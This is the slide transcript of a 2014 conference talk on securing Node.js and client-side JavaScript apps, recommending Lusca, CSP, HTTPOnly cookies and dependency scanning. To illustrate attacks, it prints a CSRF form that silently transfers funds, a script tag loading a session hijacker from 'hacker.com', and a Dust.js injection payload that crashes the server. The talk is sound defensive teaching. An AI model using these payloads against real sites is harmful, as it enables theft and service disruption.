Upgrade to Pro — share decks privately, control downloads, hide ads and more …

HTML5DevConf 2014 - Securing your JavaScript apps

Mark Stuart
May 22, 2014
Programming
0
180

HTML5DevConf 2014 - Securing your JavaScript apps

Securing your JavaScript apps

Mark Stuart

May 22, 2014
Tweet

More Decks by Mark Stuart

See All by Mark Stuart
JS@PayPal 2015 - Insanely fast rendering w/ Service Workers and Early Flushing
mstuart
0
790
Splitting up 8Ball and building/sharing components
mstuart
0
85
Midwest JS 2014 - Securing your Node.js & Single Page Apps
mstuart
2
340
enterJS 2014 - Securing your Node.js & Single Page Apps
mstuart
4
610

Other Decks in Programming

See All in Programming
雑に思考を整理する技術と効能
konifar
60
29k
単体テストを書かない技術 #phpcon_odawara
o0h
PRO
27
8.3k
Tailwind CSSを本気でカスタマイズする方法
fsubal
13
5.3k
Goのエラースタックトレースの歴史と今後
sonatard
8
1.4k
GitHub Actionsで泣かないためにやっておきたい設定 / Recommended GHA settings to avoid crying
pinkumohikan
3
530
Code Reviews
bkuhlmann
4
890
Snowflakeで眠ったデータを起こそう!
estie
0
120
ADRを一年運用してみた/adr_after_a_year
hanhan1978
7
2.4k
R言語の環境構築と基礎 Tokyo.R 112
bob3bob3
0
270
Azure OpenAI Serviceのプロンプトエンジニアリング入門
tomokusaba
3
700
エンターテイメント業界で利用されるAWS
demuyan
0
210
Blue/Greenデプロイの導入による 運用フローの改善
kudoas
1
380

Featured

See All Featured
Designing on Purpose - Digital PM Summit 2013
jponch
110
6.5k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
60
14k
The Pragmatic Product Professional
lauravandoore
25
5.8k
A Philosophy of Restraint
colly
197
16k
Bootstrapping a Software Product
garrettdimon
PRO
302
110k
WebSockets: Embracing the real-time Web
robhawkes
59
7k
Rails Girls Zürich Keynote
gr2m
91
13k
What’s in a name? Adding method to the madness
productmarketing
PRO
16
2.6k
Put a Button on it: Removing Barriers to Going Fast.
kastner
58
3.1k
We Have a Design System, Now What?
morganepeng
43
6.8k
The MySQL Ecosystem @ GitHub 2015
samlambert
243
12k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
25
2.3k

Transcript

  1. SECURING YOUR JAVASCRIPT APPS

  2. Node & Client-side JS

  3. @mark_stuart @mstuart

  4. How are you using JavaScript?

  5. Why security?

  6. None
  7. None
  8. None

  9. Not just PayPal, but your company too.

  10. None
  11. None
  12. None

  13. Web Security State of the Union 2014

  14. Same vulnerabilities. Nothing new.

  15. ok cya.

  16. Node

  17. Know what you require() Rule #1 ! ! !

  18. NPM has ~75,000 modules

  19. Anyone can publish anything

  20. And they can do some terrible things

  21. Use good security defaults Rule #2 ! ! !

  22. Node is a set of barebones modules

  23. HTTP OS DNS TLS/SSL Path Process UDP URL File System

    Crypto Buffer

  24. Express is a barebones framework

  25. Express does very little to secure your app

  26. But, that’s okay!

  27. … Drum roll …

  28. None

  29. Enterprise-grade Express

  30. Lusca App Security module for Express

  31. var express = require(‘express’), app = express(), lusca = require(‘lusca’);

  32. app.use(lusca.csrf()); app.use(lusca.csp({ /* ... */ })); app.use(lusca.hsts({ maxAge: 31536000 });

    app.use(lusca.xframe('SAMEORIGIN')); app.use(lusca.p3p('ABCDEF')); app.use(lusca.xssProtection(true);

  33. Pardon the interruption

  34. CSRF

  35. Trick victim’s browser into making malicious requests CSRF

  36. All you need is a valid cookie. CSRF

  37. CSRF " Victim somebank .com # Cookie

  38. CSRF " Victim hackedsite .com somebank .com Cookie

  39. CSRF <form name=“someHiddenForm” action=“http://somebank.com/webapps/ transferFunds”> <input type=“hidden” name=“amount” value=“500.00” />

    <input type=“hidden” name=“recipient” value=“[email protected]” /> </form> ! <script>document.forms.someHiddenForm.submit();</script>

  40. It’s still just an HTTP request. CSRF

  41. If only we had a way to ensure requests were

    legitimate… CSRF

  42. lusca.csrf();

  43. Token synchronizer pattern lusca.csrf();

  44. 1. Creates a random token lusca.csrf(); (using some crazy crypto

    libraries)

  45. 2. Adds token to res.locals lusca.csrf();

  46. 3. Dump token on the page <input type=“hidden” name=“csrf” value=“{{_csrf}}”

    /> lusca.csrf();

  47. 4. Send token with every POST, PUT, DELETE request lusca.csrf();

  48. $.ajaxPrefilter(function(options, _, xhr) { if (!xhr.crossDomain) { xhr.setRequestHeader('X-CSRF-Token', csrfToken); }

    }); lusca.csrf();

  49. lusca.csrf(); 5. Verify token is correct, otherwise return 403.

  50. CSP

  51. CSP is really awesome.

  52. It’s basically a whitelist.

  53. Content-Security-Policy: default-src 'self' https://*.your-cdn.com; script-src 'self' https://*.your-cdn.com; img-src https://*.your-cdn.com data:;

    object-src 'self'; font-src 'self' https://*.googlefonts.com; connect-src … frame-src … style-src … media-src …
  54. None

  55. lusca.csp( { /* … */ } );

  56. lusca.csp({ "default-src": "'self' https://*.your-cdn.com”, "script-src": “'self' https://*.your-cdn.com”, "img-src": “https://*.your-cdn.com data:”,

    "font-src": “‘self’", “report-uri”: “https://mysite.com/cspReporter” });

  57. “report-uri”: “https://mysite.com/cspReporter”

  58. lusca.hsts();

  59. lusca.hsts(); Ensures HTTPS traffic

  60. lusca.hsts(); Helps prevent MITM attacks

  61. lusca.xframe();

  62. lusca.xframe(); Prevent others from loading your app in an iframe

  63. None

  64. app.use(lusca.xssProtection()); app.use(lusca.p3p());

  65. app.use(lusca.csrf()); app.use(lusca.csp({ /* ... */ })); app.use(lusca.hsts({ maxAge: 31536000 });

    app.use(lusca.xframe('SAMEORIGIN')); app.use(lusca.p3p('ABCDEF')); app.use(lusca.xssProtection(true);

  66. HTTPOnly cookies

  67. Prevents session hijacking HTTPOnly cookies

  68. app.use(express.session({ secret: ‘0m6!s3cr37’, cookie: { httpOnly: true, secure: true },

    })); HTTPOnly cookies

  69. Set-Cookie:! connect.sid=%3AbzLqvcp7DnQJMaLAPmJ7p; ! Path=/; Expires=Wed, 21 May 2014 18:26:44 GMT;

    HttpOnly HTTPOnly cookies

  70. Handle errors, or crash. Rule #3 ! ! !

  71. ! Wed, 21 May 2014 18:49:00 GMT ! uncaughtException Object

    #<Object> has no method ‘forEach'! ! TypeError: Object #<Object> has no method 'forEach'! at module.exports.fetchSettings (/Users/marstuart/oddjob/helpers.js:174:18)! ! Process finished with exit code 1!

  72. Basically, a DOS attack

  73. Either catch them, or restart

  74. Eval is still evil Rule #4 ! ! !

  75. Node is still JavaScript

  76. Dust.js {@if cond=“{cardType} === ‘VISA’”} <li class=“visa”></li> {/if}

  77. Node Security Project http://nodesecurity.io

  78. Audit all modules in NPM

  79. Contribute patches

  80. Educate others

  81. None

  82. Scan for vulnerable modules Rule #5 ! ! !

  83. npm install grunt-nsp-package —save-dev grunt validate-package

  84. None

  85. Make it a part of your CI

  86. Update your dependencies Rule #6 ! ! !

  87. Add a badge to your README

  88. david-dm.org <img src=“https://david-dm.org/username/repo.png” />

  89. None

  90. ESLint custom rules

  91. Let’s recap…

  92. 1. Know what you’re require()’ing 2. Node is still JavaScript

    3. Use good security defaults 4. Security can be automated, too!

  93. Client-side JS

  94. Content injection

  95. XSS sucks. It’s everywhere.

  96. Escape everything. Rule #1 ! ! !

  97. <script src=“http://hacker.com/session-hijacker.js”></script> &lt;script src=&#39;http://hacker.com/ sessionhijacker.js&#39;&gt;&lt;/script&gt;

  98. User input and “backend” data

  99. Persistent or Stored XSS

  100. " Attacker yoursite.com PUT /account/edit { firstName: ‘<script>…’ } "

    Victim " Victim <script>…</script> GET /addressBook <script>…</script> GET /addressBook yoursite.com yoursite.com

  101. Don’t trust backend services to escape properly

  102. Know your templating library. Rule #2 ! ! !

  103. Use it properly.

  104. Underscore templates

  105. <input type=“text” name=“zipCode” value=“<%- zipCode %>” /> <input type=“text” name=“zipCode”

    value=“<%= zipCode %>” />

  106. Dust.js templates

  107. {@if cond=“{cardType} === ‘VISA’”} <li class=“visa”></li> {/if}

  108. {@if cond=“{zipCode} === {defaultZipCode}”} <li class=“default”></li> {/if} { “zipCode”: “\\”,

    “defaultZipCode”: “);process.exit();//“ }

  109. Your server’s crashed. $

  110. Upgrade your front-end dependencies. Rule #3 ! ! !

  111. Retire.js

  112. jQuery <1.9.0 jQuery Mobile <1.0.1 Backbone <0.5.0 Angular <1.2.0 Handlebars

    <1.0.0 YUI <3.5.0 Ember <1.3.0 Mustache <0.3.1

  113. Running "retire:jsPath" (retire) task! ! >> test-files/jquery-1.6.js! >> ↳ jquery

    1.6 has known vulnerabilities: http://web.nvd.nist.gov/view/ vuln/detail?vulnId=CVE-2011-4969! ! >> Aborted due to warnings. npm install grunt-retire --save-dev grunt retire

  114. Automate it!

  115. Rules of Thumb

  116. No matter what you do, someone will always find a

    way in

  117. But, you’ll get 80% there if you…

  118. Choose libraries with good security defaults. ! ! !

  119. Sanitize data coming in and going out. ! ! !

  120. Update your dependencies! ! ! !

  121. Automate security, too. ! ! !

  122. thanks!

  123. mark stuart @mark_stuart @mstuart

  124. Links https://github.com/nodesecurity/grunt-nsp-package https://github.com/bekk/grunt-retire https://nodesecurity.io/ https://github.com/evilpacket/helmet http://krakenjs.com/ https://github.com/krakenjs/lusca https://david-dm.org/ https://www.owasp.org/index.php/Cross-Site